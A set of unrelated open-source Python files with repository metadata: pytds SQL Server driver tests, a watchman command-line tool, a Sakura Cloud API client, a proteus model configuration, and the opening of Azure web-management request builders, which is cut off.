self.assertEqual(cur.fetchall(), [(val,)])
testval(Timestamp(2010, 1, 2, 20, 21, 22, 345678))
testval(Timestamp(2010, 1, 2, 0, 0, 0))
testval(Timestamp(1, 1, 1, 0, 0, 0))
testval(Timestamp(9999, 12, 31, 23, 59, 59, 999999))
def test_date(self):
if not IS_TDS73_PLUS(self.conn):
self.skipTest('Requires TDS7.3+')
def testval(val):
with self.conn.cursor() as cur:
cur.execute('select cast(%s as date)', (val,))
self.assertEqual(cur.fetchall(), [(val,)])
testval(Date(2010, 1, 2))
testval(Date(2010, 1, 2))
testval(Date(1, 1, 1))
testval(Date(9999, 12, 31))
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class Auth(unittest.TestCase):
@unittest.skipUnless(os.getenv('NTLM_USER') and os.getenv('NTLM_PASSWORD'), "requires NTLM_USER and NTLM_PASSWORD environment variables to be set")
def test_ntlm(self):
conn = connect(settings.HOST, auth=pytds.login.NtlmAuth(user_name=os.getenv('NTLM_USER'), password=os.getenv('NTLM_PASSWORD')))
with conn.cursor() as cursor:
cursor.execute('select 1')
cursor.fetchall()
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
def test_sspi(self):
from pytds.login import SspiAuth
with connect(settings.HOST, auth=SspiAuth()) as conn:
with conn.cursor() as cursor:
cursor.execute('select 1')
cursor.fetchall()
@unittest.skipIf(getattr(settings, 'SKIP_SQL_AUTH', False), 'SKIP_SQL_AUTH is set')
def test_sqlauth(self):
with connect(settings.HOST, user=settings.USER, password=settings.PASSWORD) as conn:
with conn.cursor() as cursor:
cursor.execute('select 1')
cursor.fetchall()
class CloseCursorTwice(ConnectionTestCase):
def runTest(self):
cursor = self.conn.cursor()
cursor.close()
cursor.close()
class RegressionSuite(ConnectionTestCase):
def test_cancel(self):
self.conn.cursor().cancel()
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class TimezoneTests(unittest.TestCase):
def check_val(self, conn, sql, input, output):
with conn.cursor() as cur:
cur.execute('select ' + sql, (input,))
rows = cur.fetchall()
self.assertEqual(rows[0][0], output)
def runTest(self):
kwargs = settings.CONNECT_KWARGS.copy()
use_tz = utc
kwargs['use_tz'] = use_tz
kwargs['database'] = 'master'
with connect(*settings.CONNECT_ARGS, **kwargs) as conn:
# Naive time should be interpreted as use_tz
self.check_val(conn, '%s',
datetime(2011, 2, 3, 10, 11, 12, 3000),
datetime(2011, 2, 3, 10, 11, 12, 3000, utc))
# Aware time should be passed as-is
dt = datetime(2011, 2, 3, 10, 11, 12, 3000, tzoffset(1))
self.check_val(conn, '%s', dt, dt)
# Aware time should be converted to use_tz if not using datetimeoffset type
dt = datetime(2011, 2, 3, 10, 11, 12, 3000, tzoffset(1))
if IS_TDS73_PLUS(conn):
self.check_val(conn, 'cast(%s as datetime2)', dt, dt.astimezone(use_tz))
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class DbapiTestSuite(dbapi20.DatabaseAPI20Test, ConnectionTestCase):
driver = pytds
connect_args = settings.CONNECT_ARGS
connect_kw_args = settings.CONNECT_KWARGS
# def _connect(self):
# return connection
def _try_run(self, *args):
with self._connect() as con:
with con.cursor() as cur:
for arg in args:
cur.execute(arg)
def _try_run2(self, cur, *args):
for arg in args:
cur.execute(arg)
# This should create the "to_lower" sproc.
def _callproc_setup(self, cur):
self._try_run2(
cur,
"""IF OBJECT_ID(N'[dbo].[to_lower]', N'P') IS NOT NULL DROP PROCEDURE [dbo].[to_lower]""",
"""
CREATE PROCEDURE to_lower
@input nvarchar(max)
AS
BEGIN
select LOWER(@input)
END
""",
)
# This should create a sproc with a return value.
def _retval_setup(self, cur):
self._try_run2(
cur,
"""IF OBJECT_ID(N'[dbo].[add_one]', N'P') IS NOT NULL DROP PROCEDURE [dbo].[add_one]""",
"""
CREATE PROCEDURE add_one (@input int)
AS
BEGIN
return @input+1
END
""",
)
def test_retval(self):
with self._connect() as con:
cur = con.cursor()
self._retval_setup(cur)
values = cur.callproc('add_one', (1,))
self.assertEqual(values[0], 1, 'input parameter should be left unchanged: %s' % (values[0],))
self.assertEqual(cur.description, None, "No resultset was expected.")
self.assertEqual(cur.return_value, 2, "Invalid return value: %s" % (cur.return_value,))
# This should create a sproc that returns result sets and a return value.
def _retval_select_setup(self, cur):
self._try_run2(
cur,
"""IF OBJECT_ID(N'[dbo].[add_one_select]', N'P') IS NOT NULL DROP PROCEDURE [dbo].[add_one_select]""",
"""
CREATE PROCEDURE add_one_select (@input int)
AS
BEGIN
select 'a' as a
select 'b' as b
return @input+1
END
""",
)
def test_retval_select(self):
with self._connect() as con:
cur = con.cursor()
self._retval_select_setup(cur)
values = cur.callproc('add_one_select', (1,))
self.assertEqual(values[0], 1, 'input parameter should be left unchanged: %s' % (values[0],))
self.assertEqual(len(cur.description), 1, "Unexpected resultset.")
self.assertEqual(cur.description[0][0], 'a', "Unexpected resultset.")
self.assertEqual(cur.fetchall(), [('a',)], 'Unexpected resultset.')
self.assertTrue(cur.nextset(), 'No second resultset found.')
self.assertEqual(len(cur.description), 1, "Unexpected resultset.")
self.assertEqual(cur.description[0][0], 'b', "Unexpected resultset.")
self.assertEqual(cur.return_value, 2, "Invalid return value: %s" % (cur.return_value,))
with self.assertRaises(Error):
cur.fetchall()
# This should create a sproc with an output parameter.
def _outparam_setup(self, cur):
self._try_run2(
cur,
"""IF OBJECT_ID(N'[dbo].[add_one_out]', N'P') IS NOT NULL DROP PROCEDURE [dbo].[add_one_out]""",
"""
CREATE PROCEDURE add_one_out (@input int, @output int OUTPUT)
AS
BEGIN
SET @output = @input+1
END
""",
)
def test_outparam(self):
with self._connect() as con:
cur = con.cursor()
self._outparam_setup(cur)
values = cur.callproc('add_one_out', (1, output(value=1)))
self.assertEqual(len(values), 2, 'expected 2 parameters')
self.assertEqual(values[0], 1, 'input parameter should be unchanged')
self.assertEqual(values[1], 2, 'output parameter should receive the new value')
values = cur.callproc('add_one_out', (None, output(value=1)))
self.assertEqual(len(values), 2, 'expected 2 parameters')
self.assertEqual(values[0], None, 'input parameter should be unchanged')
self.assertEqual(values[1], None, 'output parameter should be None for a None input')
def test_assigning_select(self):
# test that assigning select does not interfere with result sets
with self._connect() as con:
cur = con.cursor()
cur.execute("""
declare @var1 int
select @var1 = 1
select @var1 = 2
select 'value'
""")
self.assertFalse(cur.description)
self.assertTrue(cur.nextset())
self.assertFalse(cur.description)
self.assertTrue(cur.nextset())
self.assertTrue(cur.description)
self.assertEqual([(u'value',)], cur.fetchall())
self.assertFalse(cur.nextset())
cur.execute("""
set nocount on
declare @var1 int
select @var1 = 1
select @var1 = 2
select 'value'
""")
self.assertTrue(cur.description)
self.assertEqual([(u'value',)], cur.fetchall())
self.assertFalse(cur.nextset())
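# The second execute above shows the flip side: with SET NOCOUNT ON the
# server emits no tokens for the assignment selects, so the 'value'
# result set is the first and only one the cursor observes.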
# Don't need setoutputsize tests.
def test_setoutputsize(self):
pass
def help_nextset_setUp(self, cur):
self._try_run2(
cur,
"""IF OBJECT_ID(N'[dbo].[deleteme]', N'P') IS NOT NULL DROP PROCEDURE [dbo].[deleteme]""",
"""
create procedure deleteme
as
begin
select count(*) from %sbooze
select name from %sbooze
end
""" % (self.table_prefix, self.table_prefix),
)
def help_nextset_tearDown(self, cur):
cur.execute("drop procedure deleteme")
def test_ExceptionsAsConnectionAttributes(self):
pass
def test_select_decimal_zero(self):
with self._connect() as con:
expected = (
Decimal('0.00'),
Decimal('0.0'),
Decimal('-0.00'))
cur = con.cursor()
cur.execute("SELECT %s as A, %s as B, %s as C", expected)
result = cur.fetchall()
self.assertEqual(result[0], expected)
def test_type_objects(self):
with self._connect() as con:
cur = con.cursor()
cur.execute("""
select cast(0 as varchar),
cast(1 as binary),
cast(2 as int),
cast(3 as real),
cast(4 as decimal),
cast('2005' as datetime),
cast('6' as xml)
""")
self.assertTrue(cur.description)
col_types = [col[1] for col in cur.description]
self.assertEqual(col_types[0], STRING)
self.assertEqual(col_types[1], BINARY)
self.assertEqual(col_types[2], NUMBER)
self.assertEqual(col_types[2], INTEGER)
self.assertEqual(col_types[3], NUMBER)
self.assertEqual(col_types[3], REAL)
# self.assertEqual(col_types[4], NUMBER) ?
self.assertEqual(col_types[4], DECIMAL)
self.assertEqual(col_types[5], DATETIME)
self.assertEqual(col_types[6], XML)
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class TestBug4(unittest.TestCase):
def test_as_dict(self):
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
with connect(*settings.CONNECT_ARGS, **kwargs) as conn:
conn.as_dict = True
with conn.cursor() as cur:
cur.execute('select 1 as a, 2 as b')
self.assertDictEqual({'a': 1, 'b': 2}, cur.fetchone())
def _params_tests(self):
def test_val(typ, val):
with self.conn.cursor() as cur:
param = Column(type=typ, value=val)
logger.info("Testing with %s", repr(param))
cur.execute('select %s', [param])
self.assertTupleEqual(cur.fetchone(), (val,))
self.assertIs(cur.fetchone(), None)
test_val(BitType(), True)
test_val(BitType(), False)
test_val(BitType(), None)
test_val(TinyIntType(), 255)
test_val(SmallIntType(), 2 ** 15 - 1)
test_val(IntType(), 2 ** 31 - 1)
test_val(BigIntType(), 2 ** 63 - 1)
test_val(IntType(), None)
test_val(RealType(), 0.25)
test_val(FloatType(), 0.25)
test_val(RealType(), None)
test_val(SmallDateTimeType(), datetime(1900, 1, 1, 0, 0, 0))
test_val(SmallDateTimeType(), datetime(2079, 6, 6, 23, 59, 0))
test_val(DateTimeType(), datetime(1753, 1, 1, 0, 0, 0))
test_val(DateTimeType(), datetime(9999, 12, 31, 23, 59, 59, 990000))
test_val(DateTimeType(), None)
if pytds.tds_base.IS_TDS73_PLUS(self.conn._conn):
test_val(DateType(), date(1, 1, 1))
test_val(DateType(), date(9999, 12, 31))
test_val(DateType(), None)
test_val(TimeType(precision=0), time(0, 0, 0))
test_val(TimeType(precision=6), time(23, 59, 59, 999999))
test_val(TimeType(precision=0), None)
test_val(DateTime2Type(precision=0), datetime(1, 1, 1, 0, 0, 0))
test_val(DateTime2Type(precision=6), datetime(9999, 12, 31, 23, 59, 59, 999999))
test_val(DateTime2Type(precision=0), None)
test_val(DateTimeOffsetType(precision=6), datetime(9999, 12, 31, 23, 59, 59, 999999, utc))
test_val(DateTimeOffsetType(precision=6), datetime(9999, 12, 31, 23, 59, 59, 999999, tzoffset(14)))
test_val(DateTimeOffsetType(precision=0), datetime(1, 1, 1, 0, 0, 0, tzinfo=tzoffset(-14)))
#test_val(DateTimeOffsetType(precision=0), datetime(1, 1, 1, 0, 0, 0, tzinfo=tzoffset(14)))
test_val(DateTimeOffsetType(precision=6), None)
test_val(DecimalType(scale=6, precision=38), Decimal('123.456789'))
test_val(DecimalType(scale=6, precision=38), None)
test_val(SmallMoneyType(), Decimal('-214748.3648'))
test_val(SmallMoneyType(), Decimal('214748.3647'))
test_val(MoneyType(), Decimal('922337203685477.5807'))
test_val(MoneyType(), Decimal('-922337203685477.5808'))
test_val(MoneyType(), None)
test_val(UniqueIdentifierType(), None)
test_val(UniqueIdentifierType(), uuid.uuid4())
if pytds.tds_base.IS_TDS71_PLUS(self.conn._conn):
test_val(VariantType(), None)
#test_val(self.conn._conn.type_factory.SqlVariant(10), 100)
test_val(VarBinaryType(size=10), b'')
test_val(VarBinaryType(size=10), b'testtest12')
test_val(VarBinaryType(size=10), None)
test_val(VarBinaryType(size=8000), b'x' * 8000)
test_val(VarCharType(size=10), None)
test_val(VarCharType(size=10), '')
test_val(VarCharType(size=10), 'test')
test_val(VarCharType(size=8000), 'x' * 8000)
test_val(NVarCharType(size=10), u'')
test_val(NVarCharType(size=10), u'testtest12')
test_val(NVarCharType(size=10), None)
test_val(NVarCharType(size=4000), u'x' * 4000)
test_val(TextType(), None)
test_val(TextType(), '')
test_val(TextType(), 'hello')
test_val(NTextType(), None)
test_val(NTextType(), '')
test_val(NTextType(), 'hello')
test_val(ImageType(), None)
test_val(ImageType(), b'')
test_val(ImageType(), b'test')
if pytds.tds_base.IS_TDS72_PLUS(self.conn._conn):
test_val(VarBinaryMaxType(), None)
test_val(VarBinaryMaxType(), b'')
test_val(VarBinaryMaxType(), b'testtest12')
test_val(VarBinaryMaxType(), b'x' * (10 ** 6))
test_val(NVarCharMaxType(), None)
test_val(NVarCharMaxType(), 'test')
test_val(NVarCharMaxType(), 'x' * (10 ** 6))
test_val(VarCharMaxType(), None)
test_val(VarCharMaxType(), 'test')
test_val(VarCharMaxType(), 'x' * (10 ** 6))
test_val(XmlType(), '<root/>')
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class TestTds70(unittest.TestCase):
def setUp(self):
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
kwargs['tds_version'] = pytds.tds_base.TDS70
self.conn = connect(*settings.CONNECT_ARGS, **kwargs)
def test_parsing(self):
_params_tests(self)
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class TestTds71(unittest.TestCase):
def setUp(self):
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
kwargs['tds_version'] = pytds.tds_base.TDS71
self.conn = connect(*settings.CONNECT_ARGS, **kwargs)
def test_parsing(self):
_params_tests(self)
def test_transaction(self):
self.conn.rollback()
self.conn.commit()
def test_bulk(self):
f = StringIO("42\tfoo\n74\tbar\n")
with self.conn.cursor() as cur:
cur.copy_to(f, 'bulk_insert_table', schema='myschema', columns=('num', 'data'))
cur.execute('select num, data from myschema.bulk_insert_table')
self.assertListEqual(cur.fetchall(), [(42, 'foo'), (74, 'bar')])
def test_call_proc(self):
with self.conn.cursor() as cur:
val = 45
values = cur.callproc('testproc', (val, default, output(value=1)))
#self.assertEqual(cur.fetchall(), [(val,)])
self.assertEqual(val + 2, values[2])
self.assertEqual(val + 2, cur.get_proc_return_status())
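# For reference: in the callproc call above, `default` tells the server to use
# the procedure parameter's declared default, and `output(value=...)` marks an
# OUTPUT parameter; callproc returns the parameter list with output slots
# replaced by their final values (both helpers come from the pytds package).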
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class TestTds72(unittest.TestCase):
def setUp(self):
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
kwargs['tds_version'] = pytds.tds_base.TDS72
self.conn = connect(*settings.CONNECT_ARGS, **kwargs)
def test_parsing(self):
_params_tests(self)
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class TestTds73A(unittest.TestCase):
def setUp(self):
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
kwargs['tds_version'] = pytds.tds_base.TDS73A
self.conn = connect(*settings.CONNECT_ARGS, **kwargs)
def test_parsing(self):
_params_tests(self)
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class TestTds73B(unittest.TestCase):
def setUp(self):
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
kwargs['tds_version'] = pytds.tds_base.TDS73B
self.conn = connect(*settings.CONNECT_ARGS, **kwargs)
def test_parsing(self):
_params_tests(self)
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class TestRawBytes(unittest.TestCase):
def setUp(self):
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['bytes_to_unicode'] = False
kwargs['database'] = 'master'
self.conn = connect(*settings.CONNECT_ARGS, **kwargs)
def test_fetch(self):
cur = self.conn.cursor()
self.assertIsInstance(cur.execute_scalar("select cast('abc' as nvarchar(max))"), six.text_type)
self.assertIsInstance(cur.execute_scalar("select cast('abc' as varchar(max))"), six.binary_type)
self.assertIsInstance(cur.execute_scalar("select cast('abc' as text)"), six.binary_type)
self.assertIsInstance(cur.execute_scalar("select %s", ['abc']), six.text_type)
self.assertIsInstance(cur.execute_scalar("select %s", [b'abc']), six.binary_type)
rawBytes = six.b('\x01\x02\x03')
self.assertEqual(rawBytes, cur.execute_scalar("select cast(0x010203 as varchar(max))"))
self.assertEqual(rawBytes, cur.execute_scalar("select %s", [rawBytes]))
utf8char = six.b('\xee\xb4\xba')
self.assertEqual(utf8char, cur.execute_scalar("select %s", [utf8char]))
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
def test_invalid_block_size():
kwargs = settings.CONNECT_KWARGS.copy()
kwargs.update({
'blocksize': 4000,
})
with connect(**kwargs) as conn:
with conn.cursor() as cur:
cur.execute_scalar("select '{}'".format('x' * 8000))
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
def test_readonly_connection():
kwargs = settings.CONNECT_KWARGS.copy()
kwargs.update({
'readonly': True,
})
with connect(**kwargs) as conn:
with conn.cursor() as cur:
cur.execute_scalar("select 1")
| {
"content_hash": "037ecca350cc6aeae046a7144df95cbe",
"timestamp": "",
"source": "github",
"line_count": 1085,
"max_line_length": 155,
"avg_line_length": 37.13732718894009,
"alnum_prop": 0.5886732516007346,
"repo_name": "tpow/pytds",
"id": "876e6c0ec6b63031a42e1001a56a1d551c54daf1",
"size": "40325",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/all_test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "437"
},
{
"name": "Python",
"bytes": "492620"
},
{
"name": "Shell",
"bytes": "403"
}
],
"symlink_target": ""
} |
"""
Watchman command line tool
"""
import click
from watchman import Watchman
# Disable the warning that Click displays (as of Click version 5.0) when users
# use unicode_literals in Python 2.
# See http://click.pocoo.org/dev/python3/#unicode-literals for more details.
click.disable_unicode_literals_warning = True
@click.group()
def main():
"""Watchman command line tool."""
pass
@main.command()
def sync():
"""Start watching sources."""
Watchman.sync()
@main.command()
def worker():
"""Start watchman worker."""
Watchman.work()
@main.command()
def configure():
"""Configure watchman."""
Watchman.configure()
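# Illustrative shell usage of the commands defined above (the console-script
# name `watchman` is an assumption about how the package's entry points are
# wired; only the @main.command() functions are from the source):
#
#   $ watchman configure   # runs Watchman.configure()
#   $ watchman sync        # runs Watchman.sync()
#   $ watchman worker      # runs Watchman.work()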
| {
"content_hash": "f2fbe2788985298ddabe21d6298f033b",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 78,
"avg_line_length": 20.3125,
"alnum_prop": 0.6876923076923077,
"repo_name": "skcript/watchman",
"id": "46af5c4fd66a10c5a4b49fbcf514a32deca56f07",
"size": "676",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "watchman/cli/cli.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "13153"
},
{
"name": "Shell",
"bytes": "2965"
}
],
"symlink_target": ""
} |
from six.moves import urllib
from six.moves.urllib.error import URLError, HTTPError
import json, re, base64
import contextlib
from ..errors.exceptionfactory import ExceptionFactory
class Client(object):
def __init__(self, token, secret):
self.config = {
'api_root': 'https://secure.sakura.ad.jp/cloud/',
'api_root_suffix': None
}
self.set_access_key(token, secret)
@staticmethod
def native2haxe(r, depth):
return r
@staticmethod
def haxe2native(r, depth):
return r
def clone_instance(self):
instance = self.__class__(self.config['token'], self.config['secret'])
instance.set_api_root(self.config['api_root'])
instance.set_api_root_suffix(self.config['api_root_suffix'])
return instance
def set_api_root(self, url):
self.config['api_root'] = url
def set_api_root_suffix(self, suffix):
self.config['api_root_suffix'] = suffix
def set_access_key(self, token, secret):
self.config['token'] = token
self.config['secret'] = secret
auth_bytes = (token+':'+secret).encode('utf-8')
self.config['authorization'] = 'Basic ' + base64.b64encode(auth_bytes).decode("utf-8")
def request(self, method, path, params={}):
method = method.upper()
if path[0] != '/':
path = '/' + path
params_json = json.dumps(params).encode(encoding='ascii')
if method == 'GET':
if params_json is not None:
path += '?' + urllib.parse.quote(params_json)
params_json = None
if path[0:4] != 'http':
url_root = self.config['api_root']
if self.config['api_root_suffix'] is not None:
if re.compile('is1[v-z]').match(self.config['api_root_suffix']):
url_root = re.compile('/cloud/$').sub('/cloud-test/', url_root)
url_root += self.config['api_root_suffix']
url_root = re.compile('/?$').sub('/', url_root)
if url_root[-1:] != '/':
url_root += '/'
path = url_root + 'api/cloud/1.1' + path
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Authorization': self.config['authorization'],
'User-Agent': 'saklient.python ver-0.0.6 rev-705e6fc541c30cec41e72e5e531418d64f196863',
'X-Requested-With': 'XMLHttpRequest',
'X-Sakura-No-Authenticate-Header': '1',
'X-Sakura-HTTP-Method': method,
'X-Sakura-Request-Format': 'json',
'X-Sakura-Response-Format': 'json',
'X-Sakura-Error-Level': 'warning'
}
res = ''
try:
req = urllib.request.Request(path, params_json, headers)
with contextlib.closing(urllib.request.urlopen(req)) as page:
for line in page.readlines():
res += line.decode('utf-8')
except HTTPError as ex:
res = ex.read().decode('utf8', 'ignore')
ret = None
try:
ret = json.loads(res)
except Exception:
pass
if not isinstance(ret, dict):
ret = {"error_code": None, "error_msg": None}
raise ExceptionFactory.create(ex.code, ret["error_code"], ret["error_msg"])
return json.loads(res)
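# Minimal usage sketch for the Client above. Assumptions: the token/secret are
# valid Sakura Cloud API credentials and '/server' is a valid API path; none of
# these literals come from this file.
#
#   client = Client('YOUR_TOKEN', 'YOUR_SECRET')
#   client.set_api_root_suffix('is1a')                 # select a zone
#   result = client.request('GET', '/server', {'Count': 5})
#   print(result)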
| {
"content_hash": "c24920f414a40c2ee7199c0563b7605d",
"timestamp": "",
"source": "github",
"line_count": 92,
"max_line_length": 99,
"avg_line_length": 37.630434782608695,
"alnum_prop": 0.5427498555748123,
"repo_name": "sakura-internet/saklient.python",
"id": "1ed1e2a8030383fc71fbb96674ffbfb427076983",
"size": "3487",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "saklient/cloud/client.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "610037"
},
{
"name": "Shell",
"bytes": "874"
}
],
"symlink_target": ""
} |
from proteus import *
from proteus.default_p import *
from marin import *
from proteus.mprans import MCorr
LevelModelType = MCorr.LevelModel
coefficients = MCorr.Coefficients(LSModel_index=2,V_model=0,me_model=4,VOFModel_index=1,
applyCorrection=applyCorrection,nd=nd,checkMass=False,useMetrics=useMetrics,
epsFactHeaviside=epsFact_consrv_heaviside,
epsFactDirac=epsFact_consrv_dirac,
epsFactDiffusion=epsFact_consrv_diffusion)
class zero_phi:
def __init__(self):
pass
def uOfX(self,X):
return 0.0
def uOfXT(self,X,t):
return 0.0
initialConditions = {0:zero_phi()}
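# Per the proteus convention used throughout these *_p.py files, the
# initialConditions dict maps each solution component index to an object
# exposing uOfXT(X, t); here component 0 of the mass-correction model starts
# from a uniformly zero correction field.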
| {
"content_hash": "6ef09a1aaa786707635a6d7df2ab85aa",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 110,
"avg_line_length": 28.692307692307693,
"alnum_prop": 0.6072386058981233,
"repo_name": "erdc-cm/air-water-vv",
"id": "42a7ee5945e575f7e59d3588a50b3e6bdc36a0e8",
"size": "746",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "3d/marin/ls_consrv_p.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "1128"
},
{
"name": "GLSL",
"bytes": "3787"
},
{
"name": "Jupyter Notebook",
"bytes": "8264154"
},
{
"name": "M",
"bytes": "435"
},
{
"name": "Python",
"bytes": "1992474"
},
{
"name": "Shell",
"bytes": "14414"
}
],
"symlink_target": ""
} |
from typing import Any, Callable, Dict, Iterable, List, Optional, TypeVar, Union, cast
from msrest import Serializer
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
from .._vendor import MixinABC, _convert_request, _format_url_section
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_request(
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/providers/Microsoft.Web/hostingEnvironments")
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
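# Sketch of how these request builders are consumed. Assumption: an azure-core
# pipeline obtained from the generated operations client (the `_pipeline`
# attribute below follows the convention used elsewhere in this package and is
# not defined in this file):
#
#   request = build_list_request(subscription_id="<subscription-id>")
#   pipeline_response = client._client._pipeline.run(request, stream=False)
#   response = pipeline_response.http_response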
def build_list_by_resource_group_request(
resource_group_name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_get_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_create_or_update_request_initial(
resource_group_name: str,
name: str,
subscription_id: str,
*,
json: Optional[_models.AppServiceEnvironmentResource] = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', None)) # type: Optional[str]
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
if content_type is not None:
_headers['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PUT",
url=_url,
params=_params,
headers=_headers,
json=json,
content=content,
**kwargs
)
def build_delete_request_initial(
resource_group_name: str,
name: str,
subscription_id: str,
*,
force_delete: Optional[bool] = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
